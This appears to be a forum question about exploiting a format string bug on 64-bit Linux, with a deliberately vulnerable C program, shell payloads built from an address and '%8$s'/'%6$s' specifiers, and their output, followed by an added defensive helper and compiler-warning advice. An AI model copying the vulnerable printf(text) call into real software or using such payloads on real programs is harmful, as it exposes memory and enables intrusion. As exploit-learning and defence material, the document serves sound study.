I am trying to read values from the environment using a format string vulnerability. There are write-ups of this class of bug all over the web, but every example I have found only covers 32-bit Linux, while my desktop runs 64-bit Linux.
Here is the code I am using to run the tests:
fmt_vuln.c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char text[1024];
    static int test_val = -72;

    if (argc < 2) {
        printf("Usage: %s <text to print>\n", argv[0]);
        exit(0);
    }
    strcpy(text, argv[1]);

    printf("The right way to print user-controlled input:\n");
    printf("%s", text);
    printf("\nThe wrong way to print user-controlled input:\n");
    printf(text);   /* user input used as the format string: the vulnerable call */
    printf("\n");

    // Debug output: the cast keeps the low 32 bits of the address, as the original %08x did
    printf("[*] test_val @ 0x%08x = %d 0x%08x\n",
           (unsigned int)(uintptr_t)&test_val, test_val, (unsigned int)test_val);
    exit(0);
}
After compiling, I put in a test variable and get its address. Then I pass it to the program as an argument, adding a bunch of format specifiers so that it reads from it:
$ env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games
$ ./getenvaddr PATH ./fmt_vuln
PATH will be at 0x7ffcf14ba414
$ ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%8\$s
The right way to print user-controlled input:
����%8$s
The wrong way to print user-controlled input:
zsh: segmentation fault ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%8\$s
$ ./fmt_vuln $(printf "\x14\xe4\xff\xff\xff\x7f")%6\$s
The right way to print user-controlled input:
����%6$s
The wrong way to print user-controlled input:
�����b���
[*] test_val @ 0x00404038 = -72 0xffffffb8
//expected output
The wrong way to print user-controlled input:
????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
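The safe call in the question, printf("%s", text), is the whole fix; the example below (added here, not part of the question or of fmt_vuln.c) complements it with a hypothetical helper that detects printf conversions, including the positional "%N$" form used in the question, in user-supplied text so that a log or audit hook can flag the attempt while still printing the text literally.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Count printf conversions in s. "%%" is a literal percent and is not counted;
 * positional "%6$s" style specifiers are counted like any other. Returns -1
 * if the string ends inside a specifier (also a sign of tampering).
 * Hypothetical helper written for this example. */
static int count_conversions(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;          /* "%%" */
        if (*p == '\0') return -1;        /* lone '%' at end of string */
        /* skip positional index, flags, width, precision and length modifiers */
        while (*p && strchr("0123456789$-+ #.'hlLqjzt*", *p)) p++;
        if (*p == '\0') return -1;        /* conversion letter missing */
        n++;
    }
    return n;
}

/* Print user-controlled text without ever using it as a format string.
 * Returns true when the text contained no conversions, false when something
 * that looks like an injected specifier was seen (and reported on stderr). */
static bool print_user_text(const char *text, FILE *out) {
    int conv = count_conversions(text);
    if (conv != 0)
        fprintf(stderr, "[!] input contains %d format conversion(s); printed literally\n", conv);
    fputs(text, out);                     /* equivalent to printf("%s", text) */
    fputc('\n', out);
    return conv == 0;
}
```

Compiling fmt_vuln.c with -Wformat -Wformat-security (or -Werror=format-security) makes gcc and clang report the printf(text) call at build time, which is the check to rely on before any runtime scan.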